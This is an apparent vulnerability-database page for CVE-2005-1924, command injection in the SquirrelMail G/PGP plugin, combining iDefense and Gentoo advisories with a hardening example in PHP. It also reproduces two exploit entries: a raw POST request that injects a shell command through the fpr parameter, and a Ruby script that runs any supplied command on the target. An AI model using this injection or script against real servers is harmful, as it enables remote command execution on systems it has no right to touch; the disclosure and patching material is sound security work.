CVE-2005-1924
CVSS9.3
Published: 2005-12-31 00:00:00
Revised: 2012-10-30 21:47:31
NMCOEPS    

[Original] The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.


[CNNVD] SquirrelMail G/PGP Encryption Plugin Multiple Remote Command Execution Vulnerabilities (CNNVD-200512-716)

SquirrelMail is a feature-rich webmail application implemented in PHP4 that runs on Linux/Unix-like operating systems.
SquirrelMail's implementation contains multiple input validation vulnerabilities that remote attackers may exploit to execute arbitrary commands on the server. The G/PGP encryption plugin in SquirrelMail does not properly filter certain included files; gpg_help.php and gpg_help_base.php may include local files supplied through the "help" HTTP GET request parameter.

- CVSS (Base Score)

CVSS score: 9.3 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [no authentication required for exploitation]

- CPE (Affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (Technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1924
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1924
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-716
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2007/2513
(UNKNOWN)  VUPEN  ADV-2007-2513
http://www.securityfocus.com/bid/24874
(UNKNOWN)  BID  24874
http://www.securityfocus.com/archive/1/archive/1/473370/100/0/threaded
(UNKNOWN)  BUGTRAQ  20070711 SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
http://www.attrition.org/pipermail/vim/2007-July/001710.html
(UNKNOWN)  VIM  20070711 True: SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln
http://secunia.com/advisories/26035
(VENDOR_ADVISORY)  SECUNIA  26035
http://osvdb.org/37924
(UNKNOWN)  OSVDB  37924
http://osvdb.org/37923
(UNKNOWN)  OSVDB  37923
http://milw0rm.com/exploits/4173
(UNKNOWN)  MILW0RM  4173
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=331
(UNKNOWN)  IDEFENSE  20070711 SquirrelMail G/PGP Plugin gpg_recv_key() Command Injection Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=329
(UNKNOWN)  IDEFENSE  20070711 SquirrelMail G/PGP Plugin deleteKey() Command Injection Vulnerability
http://xforce.iss.net/xforce/xfdb/35364
(UNKNOWN)  XF  squirrelmail-gpgp-keyfunc-command-execution(35364)
http://xforce.iss.net/xforce/xfdb/35355
(UNKNOWN)  XF  squirrelmail-gpgp-keyring-command-execution(35355)
http://security.gentoo.org/glsa/glsa-200708-08.xml
(UNKNOWN)  GENTOO  GLSA-200708-08
http://secunia.com/advisories/26424
(UNKNOWN)  SECUNIA  26424

- Vulnerability information

SquirrelMail G/PGP Encryption Plugin Multiple Remote Command Execution Vulnerabilities
High risk  Input validation
2005-12-31 00:00:00 2012-12-26 00:00:00
Remote
SquirrelMail is a feature-rich webmail application implemented in PHP4 that runs on Linux/Unix-like operating systems.
SquirrelMail's implementation contains multiple input validation vulnerabilities that remote attackers may exploit to execute arbitrary commands on the server. The G/PGP encryption plugin in SquirrelMail does not properly filter certain included files; gpg_help.php and gpg_help_base.php may include local files supplied through the "help" HTTP GET request parameter.

- Advisories and patches

        

- Vulnerability information (4173)

SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln (EDBID:4173)
php webapps
2007-07-11 Verified
0 jmp-esp
N/A [Download]
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability

Bugtraq ID: 24782

-----------------------------

There are various vulnerabilities in this software! One is in
keyring_main.php!
$fpr is not escaped from shell commands!

testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#

***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

id=C5B1611B8E71C***&fpr= | touch /tmp/w00t |
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1

...

testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#

So we just executed 'touch /tmp/w00t'!

WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
lol @ WabiSabiLabi!

Greets:

oli and all members of jmp-esp!


jmp-esp is looking for people who are interested in IT security!
Currently we are looking for people who like to write articles for a
German ezine or are interested in exchanging information, exploits...

IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
    #main

# milw0rm.com [2007-07-11]
		

- Vulnerability information (4718)

SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit (EDBID:4718)
php webapps
2007-12-11 Verified
0 Backdoored
N/A [Download]
#!/usr/local/bin/ruby

puts"http://backdoored.net\n"
puts "SquirrelMail G/PG deletekey() command injection exploit\n"
puts "http://backdoored.net    Visit Us\n"
puts "Coded by Backdoored member.   \n" 
puts "--------------------------------------------------\n"

if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] ==  nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil
puts "Usage: ./squ_xploit  hostname path port cookie command 0\n"
puts "if host using ssl use 1 instead of 0\n"
exit
end

require 'net/http'
require 'net/https'

host = ARGV[0].to_s
port = ARGV[2].to_i
cookie = ARGV[3].to_s
victim = Net::HTTP.new(host,port)
	if ARGV[3].to_i == 1
	puts "Entering SSL mode baby\n"
	victim.use_ssl = true
	end
command = ARGV[4].to_s
#path = '/sq/plugins/gpg/modules/keyring_main.php'
path = ARGV[1].to_s
data = "id=C5B1611B8E71C***&fpr= | " + command + "| &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1"
pizza = "key=pYWrEbVTY%2Bc%3D; SQMSESSID=" + cookie;
headers = {
  'Cookie' => pizza,
  'Referer' => 'http://www.google.com',
  'Content-Type' => 'application/x-www-form-urlencoded'
}
resp, data = victim.post(path,data,headers)
puts 'Message = ' + resp.message
puts  'Code = ' + resp.code

resp.each {|key,val| puts key + ' = ' + val}
#puts data

# milw0rm.com [2007-12-11]
		

- Vulnerability information (F58497)

Gentoo Linux Security Advisory 200708-8 (PacketStormID:F58497)
2007-08-14 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-1924,CVE-2006-4169
[Download]

Gentoo Linux Security Advisory GLSA 200708-08 - The functions deletekey(), gpg_check_sign_pgp_mime() and gpg_recv_key() used in the SquirrelMail G/PGP encryption plugin do not properly escape user-supplied data. Versions less than 1.4.10a-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200708-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SquirrelMail G/PGP plugin: Arbitrary code execution
      Date: August 11, 2007
      Bugs: #185010
        ID: 200708-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in SquirrelMail, allowing
for the remote execution of arbitrary code.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /   Vulnerable   /           Unaffected
    -------------------------------------------------------------------
  1  mail-client/squirrelmail     < 1.4.10a-r2           >= 1.4.10a-r2

Description
===========

The functions deletekey(), gpg_check_sign_pgp_mime() and gpg_recv_key()
used in the SquirrelMail G/PGP encryption plugin do not properly escape
user-supplied data.

Impact
======

An authenticated user could use the plugin to execute arbitrary code on
the server, or a remote attacker could send a specially crafted e-mail
to a SquirrelMail user, possibly leading to the execution of arbitrary
code with the privileges of the user running the underlying web server.
Note that the G/PGP plugin is disabled by default.

Workaround
==========

Enter the SquirrelMail configuration directory
(/usr/share/webapps/squirrelmail/version/htdocs/config), then execute
the conf.pl script. Select the plugins menu, then select the gpg plugin
item number in the "Installed Plugins" list to disable it. Press S to
save your changes, then Q to quit.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/squirrelmail-1.4.10a-r2"

References
==========

  [ 1 ] CVE-2005-1924
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1924
  [ 2 ] CVE-2006-4169
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4169

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200708-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
    

- Vulnerability information (F57672)

iDEFENSE Security Advisory 2007-07-11.5 (PacketStormID:F57672)
2007-07-12 00:00:00
iDefense Labs  idefense.com
advisory,remote,web,arbitrary
CVE-2005-1924
[Download]

iDefense Security Advisory 07.11.07 - Remote exploitation of a command injection vulnerability in the G/PGP Encryption Plugin for The SquirrelMail Project Team's SquirrelMail webmail package allows attackers to execute arbitrary commands with the privileges of the underlying web server. The gpg_recv_key() function is affected. iDefense has confirmed the existence of this vulnerability in the latest version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1. Furthermore, this vulnerability has been confirmed to exist as early as version 2.0. Other versions may be affected.

SquirrelMail G/PGP Plugin gpg_recv_key() Command Injection Vulnerability

iDefense Security Advisory 07.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 11, 2007

I. BACKGROUND

The SquirrelMail G/PGP Encryption Plugin is a general purpose
encryption, decryption, and digital signature plug-in for SquirrelMail
that implements the OpenPGP standard using GPG. More information is
available at the following URL.

http://www.squirrelmail.org/plugin_view.php?id=153

II. DESCRIPTION

Remote exploitation of a command injection vulnerability in the G/PGP
Encryption Plugin for The SquirrelMail Project Team's SquirrelMail
webmail package allows attackers to execute arbitrary commands with the
privileges of the underlying web server.

The problem specifically exists within the function gpg_recv_key()
defined in gpg_key_functions.php. A call is made to exec() with
unfiltered user-supplied data as demonstrated in the following piece of
code:

    $command = "$path_to_gpg --batch --no-tty --homedir $gpg_key_dir \
             --keyserver hkp://$keyserver --recv-key $searchkeyid 2>&1";
    [...]
    exec($command, $output, $returnval);

The aforementioned '$keyserver' variable is supplied in the POST data to
the gpg_options.php script. The attacker must have a valid authenticated
session to exploit this vulnerability.

III. ANALYSIS

Exploitation of the described vulnerability allows authenticated remote
attackers to execute arbitrary commands with the privileges of the
underlying web server.

This vulnerability could be exploited by webmail users to gain shell
access on the target server and potentially further compromise the
system with local privilege escalation vulnerabilities.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the latest
version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1.
Furthermore, this vulnerability has been confirmed to exist as early as
version 2.0. Other versions may be affected.

V. WORKAROUND

Disable the G/PGP Plugin if it is not required. Alternatively, add the
following line above the initialization of the '$command' variable just
prior to the call to exec():

    $keyserver = escapeshellarg($keyserver);

Please note that this is an unofficial source patch, but should be
sufficient as a workaround until an official patch is released from the
vendor.

VI. VENDOR RESPONSE

The maintainers of the SquirrelMail G/PGP plug-in have not responded to
repeated inquiries regarding this vulnerability. As such, it remains
unpatched, even in the most current release made on July 7th, 2007.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1924 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005  Initial vendor notification
10/27/2005  Initial vendor response
03/02/2006  Second vendor notification
02/16/2007  Third vendor notification
07/11/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright     

- Vulnerability information (F57670)

iDEFENSE Security Advisory 2007-07-11.3 (PacketStormID:F57670)
2007-07-12 00:00:00
iDefense Labs  idefense.com
advisory,remote,web,arbitrary
CVE-2005-1924
[Download]

iDefense Security Advisory 07.11.07 - Remote exploitation of a command injection vulnerability in the G/PGP Encryption Plugin for The SquirrelMail Project Team's SquirrelMail webmail package allows attackers to execute arbitrary commands with the privileges of the underlying web server. The deleteKey() functionality is affected. iDefense has confirmed the existence of this vulnerability in the latest version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1. Furthermore, this vulnerability has been confirmed to exist as early as version 2.0. Other versions may be affected.

SquirrelMail G/PGP Plugin deleteKey() Command Injection Vulnerability

iDefense Security Advisory 07.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 11, 2007

I. BACKGROUND

The SquirrelMail G/PGP Encryption Plugin is a general purpose
encryption, decryption, and digital signature plug-in for SquirrelMail
that implements the OpenPGP standard using GPG. More information is
available at the following URL.

http://www.squirrelmail.org/plugin_view.php?id=153

II. DESCRIPTION

Remote exploitation of a command injection vulnerability in the G/PGP
Encryption Plugin for The SquirrelMail Project Team's SquirrelMail
webmail package allows attackers to execute arbitrary commands with the
privileges of the underlying web server.

The problem specifically exists within the function deleteKey() defined
in gpg_keyring.php. A call is made to exec() with unfiltered
user-supplied data as demonstrated in the following piece of code:

    $command = "$path_to_gpg --batch --no-tty --yes --homedir \
                $gpg_key_dir $flag $fpr 2>&1";
    exec($command, $output, $returnval);

The deleteKey() routine is called from three files: import_key_file.php,
import_key_text.php and keyring_main.php. The '$fpr' variable from above
is supplied in the POST data. The attacker must have a valid
authenticated session to exploit this vulnerability.

III. ANALYSIS

Exploitation of the described vulnerability allows authenticated remote
attackers to execute arbitrary commands with the privileges of the
underlying web server.

This vulnerability could be exploited by webmail users to gain shell
access on the target server and potentially further compromise the
system with local privilege escalation vulnerabilities.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the latest
version of the G/PGP Encryption Plugin for SquirrelMail, version 2.1.
Furthermore, this vulnerability has been confirmed to exist as early as
version 2.0. Other versions may be affected.

V. WORKAROUND

Disable the G/PGP Plugin if it is not required. Alternatively, add the
following line above the initialization of the '$command' variable just
prior to the call to exec():

    $fpr = escapeshellarg($fpr);

Please note that this is an unofficial source patch, but should be
sufficient as a workaround until an official patch is released from the
vendor.

VI. VENDOR RESPONSE

The maintainers of the SquirrelMail G/PGP plug-in have not responded to
repeated inquiries regarding this vulnerability. As such, it remains
unpatched, even in the most current release made on July 7th, 2007.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1924 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005  Initial vendor notification
10/27/2005  Initial vendor response
03/02/2006  Second vendor notification
02/16/2007  Third vendor notification
07/11/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright     
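Both iDefense advisories above describe the same defect: a POST parameter (`$fpr` in deleteKey(), `$keyserver` in gpg_recv_key()) interpolated unquoted into a shell string that is handed to `exec()`. The following is an added example, not code from the G/PGP plugin or from iDefense: it shows that pattern next to a hardened builder that allow-lists the input and quotes every argument with `escapeshellarg()`, the function the advisory workaround applies. `$path_to_gpg`, `$gpg_key_dir`, the accepted `$flag` values and the sample fingerprint are assumed or constructed.

```php
<?php
// Added example, not code from the G/PGP plugin. $path_to_gpg, $gpg_key_dir and
// the accepted $flag values are assumptions for illustration.

// Vulnerable pattern from the advisory: $fpr lands on the command line unquoted,
// so any shell metacharacter in the POST parameter is interpreted by /bin/sh.
function build_delete_command_vulnerable(string $path_to_gpg, string $gpg_key_dir,
                                         string $flag, string $fpr): string
{
    return "$path_to_gpg --batch --no-tty --yes --homedir $gpg_key_dir $flag $fpr 2>&1";
}

// Hardened builder: accept only a hex key ID/fingerprint, restrict $flag to an
// allow-list, and single-quote every variable argument with escapeshellarg().
function build_delete_command_hardened(string $path_to_gpg, string $gpg_key_dir,
                                       string $flag, string $fpr): string
{
    // A GPG key ID or fingerprint is 8 to 40 hex digits, optionally 0x-prefixed.
    if (!preg_match('/^(0x)?[0-9A-Fa-f]{8,40}$/', $fpr)) {
        throw new InvalidArgumentException('refusing non-hex key fingerprint');
    }
    $allowed_flags = ['--delete-key', '--delete-secret-and-public-key']; // assumed
    if (!in_array($flag, $allowed_flags, true)) {
        throw new InvalidArgumentException('unexpected gpg flag');
    }
    return escapeshellarg($path_to_gpg)
        . ' --batch --no-tty --yes --homedir ' . escapeshellarg($gpg_key_dir)
        . ' ' . $flag . ' ' . escapeshellarg($fpr) . ' 2>&1';
}

// Same treatment for the gpg_recv_key() keyserver parameter: an HKP keyserver
// is a hostname with an optional port and nothing else.
function validate_keyserver(string $keyserver): string
{
    $host = '[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?';
    if (!preg_match('/^' . $host . '(:[0-9]{1,5})?$/', $keyserver)) {
        throw new InvalidArgumentException('refusing malformed keyserver');
    }
    return escapeshellarg($keyserver);
}

// Constructed inputs: the payload shape from the request quoted earlier on this
// page, a constructed fingerprint, and a keyserver value with a metacharacter.
$payload = ' | touch /tmp/w00t |';
echo build_delete_command_vulnerable('/usr/bin/gpg', '/var/sq/.gnupg', '--delete-key', $payload), "\n";
// The string above contains "| touch /tmp/w00t |" as separate pipeline stages.

foreach ([$payload, 'C5B1611B8E71C000'] as $fpr) {
    try {
        echo build_delete_command_hardened('/usr/bin/gpg', '/var/sq/.gnupg', '--delete-key', $fpr), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
foreach (['pgp.mit.edu:11371', 'pgp.mit.edu; id'] as $ks) {
    try {
        echo 'keyserver arg: ', validate_keyserver($ks), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Even with quoting in place, the allow-list check is the important part: a quoted fingerprint still cannot become a second command, but rejecting the value outright also keeps the malformed request out of gpg's error output and makes the attempt easy to log.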

- Vulnerability information

37923
SquirrelMail G/PGP (GPG) Plugin gpg_keyring.php deleteKey Function Arbitrary Command Execution
Remote / Network Access
Exploit Public, Exploit Private Vendor Verified

- Vulnerability description

- Timeline

2007-07-11 Unknown
Unknown 2007-08-11

- Solution

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Disable the G/PGP Plugin if it is not required. Alternatively, add the following line above the initialization of the '$command' variable just prior to the call to exec(): $fpr = escapeshellarg($fpr); Please note that this is an unofficial source patch, but should be sufficient as a workaround until an official patch is released from the vendor.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

SquirrelMail G/PGP Encryption Plug-in Multiple Remote Command Execution Vulnerabilities
Input Validation Error 24874
Yes Yes
2007-07-11 12:00:00 2007-12-18 08:06:00
Anonymous researchers discovered these issues. iDefense disclosed them to the public.

- Affected program versions

SquirrelMail G/PGP Encryption Plugin 2.1
SquirrelMail G/PGP Encryption Plugin 2.0
Gentoo Linux

- Vulnerability discussion

Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow attackers to execute shell commands and PHP script code. These issues occur because the application fails to sufficiently sanitize user-supplied data.

Commands and scripts would run in the context of the webserver hosting the vulnerable software.

Three separate shell command-injection vulnerabilities and one local file-include vulnerability are present in various versions of the affected plugin. One of these issues has been addressed in G/PGP Encryption 2.1, but the others are still unfixed.

One or more of these issues may already have been documented in the following BIDs, but sufficient information is not currently available to distinguish between them:

- 24782, SquirrelMail G/PGP Encryption Plug-in Unspecified Remote Command Execution Vulnerability
- 24828, SquirrelMail G/PGP Encryption Plug-in Multiple Unspecified Remote Command Execution Vulnerabilities

All affected BIDs will be updated when more information is released.

- Exploitation

Attackers may use a browser to exploit these issues.

UPDATE (December 11, 2007): An exploit of the 'deletekey()' issue is available:

- Solution

Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

NOTE: One of the command-injection issues is addressed in SquirrelMail G/PGP Encryption 2.1.

- References
